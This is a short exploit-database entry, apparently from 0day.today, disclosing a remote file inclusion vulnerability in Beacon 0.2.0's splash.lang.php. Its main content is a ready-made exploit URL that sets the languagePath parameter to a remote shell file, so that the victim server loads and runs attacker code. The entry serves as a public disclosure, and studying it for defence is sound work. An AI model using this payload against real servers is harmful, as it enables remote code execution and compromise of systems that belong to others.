id: 1867
date: 05/11/2007
title: Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

==================================================================
Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability
==================================================================



#Beacon => 2.0Remot file inclusion (languagePath)                                           

#Download script : http://download.savannah.gnu.org/releases/beacon/beacon_0_2_0.zip            

#Thanks Str0ke

#Exploit:

#http://victime.com/pbeacon_path]/beacon/language/1/splash.lang.php?languagePath=shell.txt?

#Discovered by ThE TiGeR



#  0day.today [2023-03-26]  #